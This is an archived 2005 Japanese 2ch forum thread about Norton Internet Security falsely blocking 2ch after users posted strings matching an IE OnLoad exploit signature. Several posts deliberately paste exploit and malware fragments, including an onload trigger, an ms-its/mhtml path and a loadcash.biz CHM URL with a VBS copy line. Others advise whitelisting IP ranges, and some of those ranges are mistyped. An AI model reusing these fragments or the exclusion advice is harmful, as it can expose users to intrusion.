◎正当な理由による書き込みの削除について: 生島英之 とみられる方へ:ノートン誤作動対策本部->画像>4枚
動画、画像抽出 ||
この掲示板へ
類似スレ
掲示板一覧 人気スレ 動画人気順
このスレへの固定リンク: http://5chb.net/r/operate/1133161720/ ヒント: http ://xxxx.5chb .net/xxxx のようにb を入れるだけでここでスレ保存、閲覧できます。
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
1. [侵入検知]をダブルクリック
>>1 乙
まあここに書いても
ここも反応して見れなかったからあんまり意味ないかもね
>>3 [AutoBlock] じゃなくて信頼ゾーンにおかなきゃだめぽ
>>4 それ言うとスレに貼るバカが増える
>>4 <body onload=w****w()>
らしい。一応伏せておく
>>7 いや具体的に聞きたかったんじゃないのよ
なんか貼られてるから反応してんのね?
鯖側のせいでないことだけ確認したかったのです。
でないと怖くて信頼ゾーンなんか設定できない。
ERROR:referer情報が変です。(ref1)
2chサーバの全IP
1. [ファイアウォール]をダブルクリック
× 206.223.147.0-206.226.154.255
VIPみれねええええええぇぇぇぇぇぇぇぇぇwwwwwwwwww
>>1 「アドレスをクリックすると攻撃者に反撃できます」
とかそういう機能作ってくれないかなあ、ノートン先生
13やってもギコナビ使えるようになりません。
>>14 これやったけど、運用情報だけはNISきらないとみれない
つまりノートンは使うなという警告ですか。そうですか・・・
脆弱性うんぬんはおいといてさ
598 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/11/27(日) 18:15:04
とりあえず、侵入阻止→拡張→HTTP MSIE javaScript OnLoad Rte CodeExecの
チェックを外すと出なくなるけど、
阻止してもらいたいときに切ってしまっているのはマズい気ガス
948 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/11/28(月) 18:18:55
>>898 2005なら
>>598 2004だと、侵入阻止→設定→詳細→HTTP MSIE javaScript OnLoad Rte CodeExec
を除外
世界中のフォーラム、ブログに例のキーワード貼りまくれば
問題を起こしてるのはNISだけなんです
バスターも4月に前科あるからな。
>>37 あんときゃノートン先生でよかったとつくづく思ったもんだ
('A`)ホントにどうしよ。
まールーターはさんでるし、設定緩めてもいいかー・・・
>>37 俺にとってはかえってうれしかったぞ。
1ヶ月サポ期間延長したし、
ノートンの進入検知を殺すと見れた。
>>40 みたいに、ルーターを信じてみます。。。。
一応信頼に範囲入れるという形で復帰。
ラブレターのコードと同じだからMSか脳豚どちらかが対応しないと無理だろ。
@Jane系の専用ブラウザ使ってる場合
ラブレターはなんで修正されないん?2ちゃん以外でも影響あるんじゃね?
>>52 とか
おまえらAutoBlockの遮断解除やった?
>>13 のやっただけなんだけど、(なおった)
そのままでいいのかなぁ?
auto protect offにしとくとか、そーゆー問題じゃねーの?
>>56 2005なら進入検知って項目あると思うけど
MSがIE脆弱性の対策を実行後
>>59 > MSがIE脆弱性の対策を実行後
最短でも半月は放置だね
でもWEBデザイナーにとってIEは切っても切れない関係にある
>>63 2chが攻撃してこないだろうと思うならそれでおk
これどうすればいいんだ ある板だけ見れぬ ノートン切れば見れるけど・・・
今自分が書き込んでるスレを読めないような奴は
2ちゃんねるというのは広いからね。。。色んな意味で
すまんマルチになってしまうがこっちにレスするべきだったか
http://game10.2ch.net/test/read.cgi/handygame/1133147093/ このスレが開けなくなったんだが
ここの
370 :枯れた名無しの水平思考:2005/11/28(月) 14:15:46 ID:F9m8RPjZ0
????
こいつのメール欄
これ何?これのせい?
>>71 侵入検地→AutoBlock→現在AutoBlockで遮断してあるコンピュータ
の欄に2chのアドレスがあれば解除。30分で自動でなくなるけど。
おう・・・
>>72 と
>>13 のコンボでいけたよ あるがとう
>>72 スマン早とちりした
398と500だな
2回も
>>8 これ貼ってやがる
で、侵入検地→AutoBlock→除外→削除して
ノートン解除してスレ読み込んで該当レスを透明あぼ〜んで解決できました
1. [ファイアウォール]をダブルクリック
めんどくさいならやらんでもいい
ああ、言葉足らずでゴメンナサイ
>>75 のやり方で解決したけどシマンテックがいずれ対応してくれんのかな
かくしんはん【確信犯】
ノートンはアンチウイルスだけでいいじゃん。
, '´  ̄ ̄ ` 、
先生の過保護は信頼面もカバーした上ならいいんだが
>>13 を設定したら使えるようになったんだけど
これって要するに
にちゃんの鯖からアタックきてもヌルーするぜ!って設定と考えてok?
すいません、それでその2ちゃんの鯖からのアタックっていうのは
>>13 を設定した後見るには見れたけどアンカーがずれまくってる
これはどういうことでしょう…
>>93 全て自己責任でどうぞ
そういう場所なんで
ノートンのオートプロテクトを無効にしてると、反応しないの?
とりあえず
そこまでしなくてもいいんだけどね
>>103 つい最近NIS2003を在庫処分900円で手に入れたばっかなんだが
こんなことになるとは思わなかった
>>107 ブロードバンドルーターがあれば、ファイアーウォールの設定など
ルータの設定をちゃんとやれば、という前提でならね。
>>111 いや、IEの脆弱性のほうじゃなくて、今回の誤動作対策に
2chの鯖を許可リストに入れた場合の攻撃うんぬんのほう。
ノートン作動したら、この板見れなくなったよ
>112
>>116 意味無いし、忘れた頃に原因究明したくても、あぼーんされてたら気がつかない
抜本的な解決策は
>>13 +
>>72 でいいのでしょうか?
応急なんですね。シマンテックは対応してくれるのかなぁ…。
ノートン2003の場合は、こっちも必要では?
質問・雑談スレ208@運用情報板
http://qb5.2ch.net/test/read.cgi/operate/1132976990/250 250 動け動けウゴウゴ2ちゃんねる sage 2005/11/28(月) 16:02:49 ID:sD89a3L50
でも今になって出てくるんだからセキュリティホールって言うものは恐ろしい
>>235 のを適用する方法を書きます。
ノートン2003の場合
1. [侵入検知]をダブルクリック
2. [IPアドレス]をクリック
3. 右にある除外したコンピュータの[追加]をクリック
4. [範囲を使う]をチェック
5. アドレスに「206.223.147.0-206.226.154.255」を入力してOK
とりあえず、オミトロンのフィルタ。
使ってないから知らないんだけど、PFWだけアンインストール出来ないのかい?
>>124 NAVとPFWを別に導入してるならともかく、NISではPFWだけアンインスコはたぶん無理だったかと。
もちろん、PFWをオフにして、別のFWを使う手はアリだけど。
>>122 ノートン2003の場合は[ファイアウォール]と[侵入検知]両方の設定が必要なの?
終了アドレスが >>122 だと 206.226.154.255 >>13 だと 206.223.154.255 >>126 >>125 そうか。この件であたふたするのはPC初心者だろうから、あれこれ入れろと言うのもなあ。
困ったもんだねえ。
>>13 今やったけどほんとにこれを信用していいのか?
運営側の公式な対策の発表を求めます。
>>3 やったら見れる様になったけど、これって何かまずいの?
>>131 そのアドレス範囲にあるコンピュータから攻撃を受けてもノートンが反応しない
>>127 >>3 と
>>122 の226はコピペミスだと思う。
>>13 ,14がたぶん正解。
下の鯖監視係で確認できる。あとイレギュラーなのはbeとsports2
be.2ch.net (202.222.31.214)
sports2.2ch.net (210.224.161.33)
使う鯖のIPアドレスを個別に指定したほうが安全だと思うし、
個人的にも安心する。
2ch 鯖監視係。
http://sv2ch.baila6.jp/sv2ch01.html ルーター入れてる人は
>>13 やっても問題ないんじゃないの?
壷うぜえええええええええええええええええええええええええええええええええええええええええ
少なくとも今回の壷は役に立っていると思う。
>>129 http://qb5.2ch.net/test/read.cgi/operate/1132976990/ 442 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/29(火) 15:01:54 ID:eTCs9aYs0
>運営の人
ノートン誤作動の件なんだけど明らかに狙って書き込みしてるんだから
特定文字列を書き込みしようとした人を強制バーボンとかしてもいいんじゃないの?
448 名前: ◆SSu.zv/rvs 投稿日:2005/11/29(火) 15:14:32 ID:zBqE3jpw0
淘汰されなきゃね、
生き残りを手伝う気はさらさらないっす
449 名前: ◆MUMUMUhnYI 投稿日:2005/11/29(火) 15:18:01 ID:VEIDKG1+0
そんな迷惑なソフトなんて、自然にまかせてなくなるべきだって、
おじさんはゆうだろうな。
私も、そう思っていたり。
◆SSu.zv/rvs=FOX ★ ◆MUMUMUhnYI =root ★
色々調べたら俺の使ってるjaneDoeViewでリプレイス出来るみたいだな
壷c⌒っ*゚д゚)っφ 記念カキコ
AutoBlockも解除したんだけど
で、結局どうなったんだ?
|,゚д゚)・・・・・ ツボ。それ以前に
攻撃を遮断しましたって出るけど
13と14でいいんだな
壺UEEEEEEEEEEEEeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
つぼってなんなの?
壺から来ました!!!
Monazilla/1.00 Live2ch/1.12 壷から攻撃を受けました
>>13 を実行すると2ちゃんに対して限りなく無防備になる・・!
これはひろゆきの陰謀・・2ちゃんIP除外さsghbfxg@ふじお」
それでも壷
ノートン2003版はどうしたらいい?
>>122 してもダウソ板は見れない
WIN95時代にノートン製品使って痛い目見てから俺はここのソフトは使ってない。
>>206 たぶん遮断されたままになってる
侵入検知の設定で消せ
VIP臭いとかいわれて●ログインなしで書き込めない・・・
ノートン使ってるのに2ch見れるんだけどどういうこと?
>>13 の設定でいいのかそれとも
>>133 のように個別に設定した方がいいのかどっちがいいの?
>211
壺から呼ばれました。
>>208 いや、ちゃんと遮断は削除してるんです。
個別にIP指定しても、すでに含まれてますってなるし。 もういや
壷
亀だけど礼を言いたいのは
>>96 に対してですた
>>213 検知とファイアーウォール両方いじったら直ったよ
俺の場合(2005)はFWだけ弄れば見たい板は問題なく見れるようになった。
心配なら取得する時のみ無効にすればいい。侵入検知を切るだけでおk
侵入検知はオートプロテクトを切ると切れるんですか?
壷さんからお呼びがかかりました。
昨日何とも無かったのに今日になったら誤作動したよ
ノートン先生もぼけ来てるんじゃね。
3月に期限切れる
>>237 NOD32+zonealarm or outpost
俺は今後
キングソフトのインターネットセキュリティーが今なら無料だから入れてみようかなぁ?
>>238 >>239 おれもどっちかにしようと思ってんだけど
どっちがいいかなあ
どっちか勝った方にするから悪いけど戦ってくんない?
>>239 来月切れるからその組み合わせ使わせてもらうわ
ダウソ板見れるようにしてくれよ
JaneDoe View α + Privoxy + Tor
ウイルスバスター使いなよ
あー。コレか原因は。
MSのアップパッチを最近入れてなかった俺は勝ち組。ノートン通常どおりに働いていて問題なし。
市販ソフトの誤動作に2ちゃんが尻拭いする必要はないと思うが
>>258 悪いのはこんな糞な仕様なソフト作ってるシマンティックだし
>>167 の通り、2ch側で対応するべき問題じゃない。
この問題を対応するのはシマンテック側だろ。
ま、シマンテックは今までに報告されてる誤作動も修正したことないし今回もスルーだろう
自分で
>>13 とかの応急処置をするしか方法はないかと
今回ので俺はノートンからさよならした
ギコナビみれるようになったけど、行間ができてるみたいなんだけど
役に立つかどうかは分かりませんが、誤反応しないようにdatを
書き換えるプログラムを更新してみました。
http://www.geocities.jp/cen_hp/program3.html ノートン2003だけど、どうしても、ダウソ板だけ見れないよー
ノートンの侵入検知切ったら見れるようになったけど
IE使っていない人は
>>270 私の名は喪黒福造
人呼んで笑うセールスマン
セールスマンと言っても、ただのセールスマンでは御座いません。
私の取り扱う品物は「心」人間の心で御座います。
この世は老いも若きも男も女も、心の寂しい人ばかり。
そんな皆様の心の隙間を、お埋め致します。いいえ、お代は一銭もいただきません。
お客様が満足していただけたら、それが何よりの報酬でございます。
さて、今日のお客様は……
ほぉ〜ほっほっほっ
NISの侵入検知から拡張の中のHTTP MSIE JavaScript OnLoad Rte CodeExecを除外
これと、
>>13 とはどっちが安全なの?
>>259 NIS2005Onlineです。NISのアップはバッチリやったよ。
>>269 が良い事言った。無条件で侵入ルート空けとくよりMSIE〜のチェック外す方が全然安全だわ。
別にノートン使ってる人の自己責任じゃないの?
なんか例の対策は自己責任とか出るしとってもやりにきんだけど
296 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 17:58:55 ID:Ejg9D+rr0
何も対策してないのに、少し前から急に見られるようになった。
297 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 18:00:38 ID:7P7mflxJ0
30分経過しただけじゃね?
299 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 18:05:08 ID:M2vw8U+r0
>>296 自分も。
なぜだろう。
303 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 18:18:00 ID:WmGEF4hJP
>>299 詳細: 侵入を検出して遮断しました。
news19.2ch.net(206.223.151.67)
とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
30分我慢すればいいのか。
山田もキンタマも
>>283 がすでにそれらに感染してないと
どうもならないよ ながしこんで自動感染させる事が出来たら
P2Pとかつないだ瞬間感染しちゃう
山田とかキンタマは○○.exeって感じの実行形式ファイルだから
これらをどっかから手に入れて、実行して感染して、さらに
>>283 がファイアーウォールの206.223.147.0-206.223.154.255を除外したら、
ひろゆきに、ごにょごにょされる可能性があるっちゃある
大空寺あゆってHELVAだっけ?アイツ悪で有名なのか?
反抗予告とかめちゃやばい書き込みとかはすぐ反応して消すのに・・・
>>288 見たいなのは放置なんだね運営のひと
>>13 は実行したけどWin板が読めないです... (ノД`)
すんませんでした Janeのスレ再読み込みで原因判明です
自分が見ようとしてたスレの最終レスに
>>4 が書き込まれてた (`・ω・´)
>>291 一時、先生の進入検知をオフにして
その板なりスレなりを読み込んでログを取得する。
そのあと侵入検知をオンに戻せばいい。
アンカー狂ってる人もこれやってログを再取得すれば直るよ。
難点はちょっとだけマンドクセ(´・∀・`)
>>294 はい、そんなふうにやってみますね
アドバイスどうもありがとう (*´д`*)
単なる文字列まで潔癖に反応しちゃうんだよな
>>291 Win板はちゃんと
>>13 の範囲内にあるから読めないのはおかしいな
多分侵入検知で30分読めない状態になってるとかそんなのだから
侵入検知設定で解除すれば?
このスレ、どれが反応しているの?読み込んでも残らない。
夕べノートンからバスターに乗り換えたけど、
>>303 NIS2003が思いっきり間違ってますよ。
>>303 最初の文字デカッ!老眼かよw
それなのに赤の自己責任がいやに小さいじゃないか
何にしても乙
>304
JaneDoe Viewだけど あぼーんに
>>26 と
>>267 のコードを登録すると今のところ問題ないみたい
>>308 これでおけ
NIS2003
Norton Internet Securityを開く
[ファイアーオール]をクリック
[設定]をクリック
[ホームネットワーク]タブをクリック
[信頼]→[追加]とクリック
[範囲指定を使う]にチェック
[インターネットの開始アドレス]に 206.223.147.0
[インターネットの終了アドレス]に 206.226.154.255
[OK]をクリック
×ファイアーオール
>>303 対処方法にNIS2006の場合が無いのはどうして?
>319
>>320 マァヴ氏のセキュリティ感覚に疑念を抱く漏れであった…(´-ω-`)
Down板でNIS2006のクラック方が書き込まれた後に、この騒動が起こった。
>>320 この文追加すると親切かも。
206.223.147.0-206.226.154.255 の範囲に入らない板も存在するので
必要に応じて下記URLを参照し個別に設定して下さい。
http://sv2ch.baila6.jp/sv2ch01.html なんでこういう事するやつって永久アク禁にならんの?
>324
もう面倒だから一旦NIS切ってログ取得してからONにしてる
>>318 >>324 終了アドレス
×206.226.154.255
○206.223.154.255
2004は2005と同じと判明(^_^;)追加ー
202.222.31.214 be.2ch.net
2006
2006も2005と同じ操作でいける
>>330 五月蝿い事いって悪いけど、INS2003はダイヤログの表示無く
うあー、しんど!全部一個づつ追加した。
範囲で選択しなくても「個別」で空白区切りで登録できるお
>>339 ちょwwおまwwwwwwwwwww
でも登録のとこ右クリできんかったけど
ノートンだけどまったく反応しない…
アドレス指定して、専ブラのブクマしたスレは見られるようになったが、
>>342 >>344 ノートンアンチウィルスじゃないぞ。
ノートンインターネットセキュリティの話だ。
はじめまして、こんばんわ。
僕も3日前くらいからHTTPなんちゃらエラーが出て、
2chの一部が見えたり見えなくなったりしてました。
最初は2chにアク禁されてる?とか2ch落ちてる?とか
思ったのですが、運用情報を思いついてここに来ました。
>>13 が正しいってことで無問題ね。
僕も今のところ問題なし。
>>79 びびったYO
>>2 chを信頼ゾーン
2chにハッキングされない?
ひろゆ○は2chねらーのパソコンやりたい放題じゃんw
>>ノートン先生の誤作動
高性能で検出率が高いから仕方ないと考えたら?
範囲じゃなく
>>339 をコピペしたほうがいいよ
ノートン文字列だけで反応することないだろうに
ファイアウォール部分だけのアンインストはできないから
次はアンチウイルスだけ買おうと思う
>2ちゃんねるのサーバーのIPアドレスを信頼できるゾーンに設定すればブロックされなくなるが、
>シマンテックでは「本当に危険なコードが埋め込まれた場合にブロックできなくなるので、お勧めはしない」という。
http://internet.watch.impress.co.jp/cda/news/2005/11/30/10035.html >>342 >>344 MSのアップをしていないからだよ
>339
今、バスター御試版で読んだが、なんとも無い。ふ〜ん。
>>341 登録するIPが、すでに登録されている範囲にかぶってると「かぶってるよ」って言われるけどそれかな
>>354 右クリ→貼り付けのことじゃない?
Ctrl+Vじゃなくて。
確かに、登録窓で右クリはできんよなぁ。
シマンテックでは「本当に危険なコードが埋め込まれた場合にブロックできなくなるので、お勧めはしない」という。
書き込むなって言ってみんなが書き込まなくなるなら、ウィルスやスパイウェアは蔓延しないと思う・・・
貼られてるスレがどんどん増えてるな・・・
>>356 のとおりだとメーカーは対応する気無いみたいだし
穴あけることになるのも嫌だからノートン止めるかなぁ
>>356 の書き込みソースは、
>>350 のリンク先な。
漏れの妄想じゃないから、各自で熟読してくだされ。
ラブレターコードの影響期間を思い出すと、今回のこれも相当長引きそうだよな。
NISの見切り時かもなぁ。強固なのは結構だが、柔軟性に欠け過ぎて使えねぇ・・・
今「本当に危険なコードが埋め込まれた場合」はノートン組は侵入されまくりってこと?
2ちゃんに危険なコード埋め込まれることとかあるの?
今の2chはハッカーからしたら格好のエサ場ってことか
えーと、
運営が、特定の文字列を書き込めないようにすれば良いだけなんだがなァ・・
喪前が、脳豚なんてしょーもないもんを使わないようにすれば良いだけなんだがなァ・・
さっきこのスレ見てたらブラウザが開きまくって止まらなくなったんだけど
>>367 2ちゃんだけの問題じゃなくて、他のブログ、掲示板も同じようにされたら駄目らしいし
まさに「淘汰される」べきかと
スレをひらいたらカーソンシティから攻撃されたのできました
>>372 一部の運営の中の人の発言から始まってるんだよ >淘汰されるべき
>>373 内容が理解できない、もしくは想像ができないなら、実行するべきではない。
>>372 NISだけでしょ叩かれてるのは
NAVは誰も叩いてないし
>>384 少なくともこのスレとは関係ない
つーか、あったら怖いよw
>>386 補足
(ry続き
りました。
どーもRockっぽいので・・・
>>303-352 ありがとうございます。
http://d.hatena.ne.jp/palm84/ ↑こことか
http://kmajo.blog34.fc2.com/ ↑ここを見ると とりあえず実害としては
「IEが落ちる」だけなのかな?
シグネチャ除外しようかな・・・
303-352の中に変なコードある?
みんなノートンやめるやめる言ってるがどのソフト入れる?
NIS使い2ちゃんねらが全員信頼ゾーン対策した瞬間
>>396 それが怖いから信頼ゾーンに入れられないんだよなあ…
だから信用出来ない人用に
>>108 のAAがあるわけでw
お前らちょっと無防備すぎだぞ
淘汰されるべきというのもわからんではないが、
本件の主犯はマイクロソフト、IEの穴をふさいでないからNISで対応
この中で一番悪いのは誰?
参加者追加
この文章を見た人は、4日以内に不幸が起き、44日後に死にます。知り合いは、
>>410 年内に死ぬ予定なんでべつにかまいません
運営がとろとろしてるからいけねぇんだよボケが
運営などいないという突っ込みは置いておいて。。。
>>418 http://qb5.2ch.net/test/read.cgi/operate/1132976990/448-449 448 名前: ◆SSu.zv/rvs [sage] 投稿日: 2005/11/29(火) 15:14:32 ID:zBqE3jpw0
淘汰されなきゃね、
生き残りを手伝う気はさらさらないっす
449 名前: ◆MUMUMUhnYI [sage] 投稿日: 2005/11/29(火) 15:18:01 ID:VEIDKG1+0
そんな迷惑なソフトなんて、自然にまかせてなくなるべきだって、
おじさんはゆうだろうな。
私も、そう思っていたり。
素通りさせる以外(信頼に追加以外)
>423
>>425 今回の件はノートンが、なんとかするべきだろ?
今回のコードは短過ぎる。貼る馬鹿は後をたたない。
例えば「orz」が攻撃コードと認定されたら書いた奴のせいか?
買ったばっかりだけど返品できるのか?>ノートン
ラブレターとか他のウイルスコードのことから考えてもシマンテックが対応する可能性は低い
今はイタズラで済んでるし、NIS使ってる人だけの問題だけど
ノートンが誤反応する文字列を書き込んでどんな被害が発生するの?
>>430 ただの文字列は攻撃してこないんだが
ノートンが過剰反応しすぎなんだよ
IEの脆弱性とNPFWのバグを同時に語るから混乱するんだ。
先生のバグだけに目を向けろ。IEの脆弱性はMSの問題だ。
ひろゆこが悪意のあるスクリプトを仕込む可能性があるとでも言いたいのか?
>>430 1.セキュリティソフトを乗り換え
>>433 運営自身が何もしなくても○国人(○にはお好みの文字を入れてね)に2ch鯖
ハックられてありとあらゆる攻撃スクリプトを押し込まれるという可能性は無くもない
攻撃してくる文字列は存在する
だから心配性なお前らのために(皮肉で)
>>108 の
AAが用意されてるんだよw
>>435 もちろん可能性は0%ではないわな。
でもそれを言い出すとキリがないし、おじさん達のサーバ管理能力を疑う事になる。
当然100%信用しろとは言わないが。まあ>434て事で。
MSがパッチ出すまでIE以外のブラウザ使うようにして
ノートン叩いてる人はもし自分のウイルスソフトが同じような事したら笑っていられるんだろうか
>>440 IEの穴がふさがっても、このままだと、誤反応するのは同じだぞ。
自分でどうにかはわかるけど、やっぱノートンのファイアウォールが駄目だよ
>>441 だれも叩いてるようにはみえないが。不具合を不具合と指摘してるだけ。
> 自分のウイルスソフトが同じような事したら笑っていられるんだろうか
とっとと捨てる。
>>443 金取ってるソフトだし同意とはいえるが・・・
しかし、こんな些細な事で吠えてたらOSだってクラッシュするしキリないじゃん?
問題は使い手じゃないかな?
こんな簡単な問題自分でクリアできなければ、ネットってかPCやらなければいい。
むしろPC触る資格がない。
それだけじゃない?
だから、ノートン叩いてるのはド初心者かネタのどっちか。
自分で使ってるOSの方が沢山の問題抱えてるんだからね。
>>445 がきっと修正ファイルを作ってくれると信じてる
便利であればみんなが使うしそうでなければ離れていく
|
>>117 >>118 NG使えるよ、透明で登録しておくと使える
ただし
>>118 の言うように原因究明で困る。
というのは、普通は自動で消されて問題ないのだが
該当レスにリンクする奴がいるとひっかかる。
その時は消えたレス番を探してそいつにリンクしてる奴を探さなければならんいかんので面倒。
という事でやっと突き止めた
>>299 のように該当レスに>>でリンクするのはやめてくれ・・・
死万木偶の工作員ウザ杉。
とりあえずノートンを叩いて、「おれはわかってるんだぜ」と通ぶりたいんだろw
ギコナビで透明あぼ〜ん(レスポップアップ時のあぼ〜ん有効にチェック)すれば
>>3 しなくてもいいんだな
>>451 返品とかって、、、ノートンレベルの糞ソフトも使いこなせないならネットしない方がいい。
その前にバグだらけのWindowsをMSに返してこい。
つーか、初心者はノートン使うなと。
被害妄想や詭弁や煽るだけじゃなくてさ、救護するなら
>>458 俺が脳豚を使い続ける理由は、10秒もあれば設定できて使えるから。
他の入れたりすれば金かかるしフリー入れても10秒ってわけにはいかないから。
そして救護だか何だかしらんけど、俺がここに書く理由は楽しいから(笑)
>>454 ID:SqpGkdpj0
凄い厨が湧いたな・・・
初心者だからノートンが誤作動するってか?
初心者も糞も、どんな玄人が今回の件を回避出来てるんだ?
対策が有害無害まとめてスルーしかない(これは回避策じゃない)
ノートンにちゃんと識別させる方法を教えてくれ。
>>460 シマンテックが対策する以外に方法は無いと思うが
>>460 何いってんだ?
俺は、ノートンの設定もできない初心者じゃしょーがねーってこと言ってんだよ。
>ノートンにちゃんと識別させる方法を教えてくれ。
それに何?そんな文句はシマンテックに言えよ。
脳豚に識別させるってソース開かねーんだからできるわけねーべ アホか。
俺は、文句言ってる暇あるなら設定しろと言ってるんだ。
>>462 もう、お前が初心者で厨なのは良くわかった。
IP素通りさせるのが「設定」か?(笑
初心者板で大人しくしてろ低脳。
>>462 だから煽りや詭弁は止めろといってるだろ。落ち着け。
>459をみるに、用は他のを入れるのマンドクセーし金払う気もないから
多少の不具合は設定で我慢するぜと言うことかな。
それも一つの意見だな。
>>463 IP素通りさせるのが「設定」だ。
それ以外にノートンをどうにかできると思ったのか?
変な夢みてるんじゃねーよ。ド初心者が(笑)
つーか、気に入らないなら素直に他の使えばいいだろ。
まぁ、オマエにはIP受け入れてその後にフィルタ掛けるなん(ry
6 名前:ひろゆき ◆3SHRUNYAXA 投稿日:05/01/09 00:00:25 ?## ID:RlY1yXg2
>>466 だから煽(ry
本質がずれてないか、NPFWが単なる文字列に反応する事に関しての情報の蓄積が趣旨のスレだぞ。
折角だから、使用者が初心者が多いだろうからその通のテクをここで披露すればみんなのためになるぞ。
ひろゆきの”頭悪いと思ってます”シリーズの煽り、あと何通りあったっけなぁ
>>453 あー、ポップアップにもできるならいいのかもね
LIVEにはあったかなー
と思ったら
>>455 駄目でしたか
何故かあぼんじゃ駄目なんだよね
>>14 やってみたけど未だにダウン板が見れない・・・
ナゼに??
>>468 確かにそうだなw
つか、正直煽りで暇潰して楽しんでいた。
荒らしてスマン。
BF/Q6J/m0 にも謝っておくよスマン。
じゃ一応俺の環境を書いておくよ 参考にならんと思うけど。
俺の場合ネットにはルーティングマシン通して接続してるから
ルーティングする際に怪しいコードを弾いてローカルで観覧してる。
つまり脳豚ファイァオールではなく別のマシンが防火壁になってる。
だから実は脳豚は関係無かったりする(´・ω・`)
そんじゃ消えます
>>472 autoblockのほうで設定してるとか
1日前の俺のことだが('A`)
まとめページの対処方法をやってみたら
http://www.microsoft.com/japan/technet/security/advisory/911302.mspx これによるとアクティブスクリプトを無効にすれば
HTTP MSIE JavaScript Onload Rte CodeExecの検知は必要なくなるみたいだね。
2chを信頼したくない人はこっちでやった方が良いかもよ。
\ __ /
>>474 もう一個の設定出来たらスムーズに出来ちゃいました!
親切にありがとね。
あの、
コードが貼られたスレ(板)開く
んなろー!ブラッドハウンドなんぞ貼ったやつ出てコイや!めんどくせー('A`)
>>485 それはノートン先生からログ除外すればいいんじゃ・・・(´・ω・`)
なんかスレの流れが変。
>>487 442 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/29(火) 15:01:54 ID:eTCs9aYs0(1)
>運営の人
ノートン誤作動の件なんだけど明らかに狙って書き込みしてるんだから
特定文字列を書き込みしようとした人を強制バーボンとかしてもいいんじゃないの?
448 名前: ◆SSu.zv/rvs 投稿日:2005/11/29(火) 15:14:32 ID:zBqE3jpw0
淘汰されなきゃね、
生き残りを手伝う気はさらさらないっす
449 名前: ◆MUMUMUhnYI 投稿日:2005/11/29(火) 15:18:01 ID:VEIDKG1+0
そんな迷惑なソフトなんて、自然にまかせてなくなるべきだって、
おじさんはゆうだろうな。
私も、そう思っていたり。
>>488 誤作動するのは2chだけか?
>>489 代わりは? マックか? リナか? トロンか?
OS換えるよりFW交換の方が安くて早い。
選択肢もOSより多い。
なにより
「ゲイツさん、ノートンが誤作動します。OS代金返して」
「ノートンに言え。他のソフトじゃ誤作動しない。」
で終了。
>>486 えーと、言葉足らずだったかな
めんどくせーのは、検出されるたびにそのIPを信頼リストに入れるのが、ってこと
(ま、2chすべて信頼済みにすればいいんだろけど)
実動作しない単に貼られた文字列に反応するノートン先生もトンチキだけど、
そもそもそういうのを貼るのが困ったもんだわ('A`)
自殺したとか言ってたのに今日も元気に2chかよ磊厨w
再インストールしたら、問題解決した。
INSの除外にbody onload=w**w()を追加じゃ駄目なの?
181 ◆Reffiz2Zh. sage 2005/11/28(月) 11:34:22 ID:BlBjwc9/0
>178
新手のノートントラップです。
ここじゃ、明かせないのでメールにて説明しますね。
186 ◆MUMUMUhnYI sage 2005/11/28(月) 11:51:32 ID:/3xX5FyA0
>>181 メール届きました。
ううむ。なんだかなぁ。
188 ◆MUMUMUhnYI sage 2005/11/28(月) 11:52:48 ID:/3xX5FyA0
とりあえず、問題の本質は理解したです。
ノートントラップというか、問題はもっと根が深いかんじですね。
公開情報ではありますが、確かに現段階では、ここに書くのははばかられるです。
194 ◆MUMUMUhnYI sage 2005/11/28(月) 11:56:51 ID:/3xX5FyA0
ひとことだけ。
「ノートンから除外した場合(というか一般的に当然ですが)には、
不審なリンクは不用意にクリックしない」
とゆうことで。
・・・なんか裏で極秘プロジェクトでも進んでるの?
>>498 公開の場に詳しく書くと、見る人が見た時悪用できるって事だと思う。
最後のは「ノートンの防御機能を無効にしたらユーザーが気をつける」
むむむさんが書いてる通り当然のこと。
ってかノートン入れてても怪しいリンクを安易に踏まないのは基本。
侵入防止のHTTP MSIE javaScript OnLoad Rte CodeExecに
昨日からノートン入れた者なのですが
このスレ全部読めばそんな書き込みしなくても解決するだろうに・・・
>>503 確かにな。「2ch鯖からのHTTP MSIE javaScript OnLoad Rte CodeExec検知」だけ
除外できれば言うことなしだったのに。
<body onload=window()>
>>511 <body onload=window()>
今は間カフィのほうのPCでアクセスしてるからこのスレがちゃんと見えるけど、
野トンだと
>>509 以降の表示がぶっ壊れるよ
なにやってんだかな、野トン先生orz
どれどれ。実験。 http://www.loadcash.biz//adverts//35//main.chm::/main.htm " type="text/ ∬
>>510 氏ね
>>512 お前も氏ね
>>517 お前は氏ねじゃなくて死ね!
c.Copy(dirwin&"\Win32DLL.vbs") http://www.loadcash.biz//adverts//35//main.chm::/main.htm " type="text/ >>512 とか
>>517 とかの文字列が反応するのって、
どういう誤認で誤作動するわけ?具体的に頼む
>525
>>22 の記事を読めばなんとなくわかるかと。
>>517 の本文は専ブラのログフォルダを除外対象にしとけば無問題
ホントに無問題なのか!?
>>697 わかったか?
よし、わかったんなら席に着け。
>>697 ( ´д)ヒソ(´д`)ヒソ(д` )
>>697 ちゃんったらー、ちゃんと見てないからそうなるんだよ。
まったくもー。
ノートンの
専ブラはdatしか読みに行かないから、ノートンのチェック外しても
ノートンのインジケータを隠してたから長いこと原因に気付かなかった
いきなりフジ実況見れなくなった。。。
<body onload=あwindow()> ms-its:あmhtml:file://c:\
最近書き込みが減ったところを見ると、双方対策されたって事?
暫定処置で凌いでる、ここを見られないのどちらかかと
なるほど。
ノートンの信頼ゾーンから例のアドレス群を削除してもまったく問題なし。
2006でアップデートしてみた
2chブラウザを使ってると、ログの再取得をしないから、反応しないだけ。
ん?
信頼解除してこのスレ再取得で問題なし
>>561 ちゃんと消してからやってるけど?
とりあえず自分で検証してから煽りいれないとただの恥ずかしい人だぞ
今日2006インスコ→LiveUpdateした後
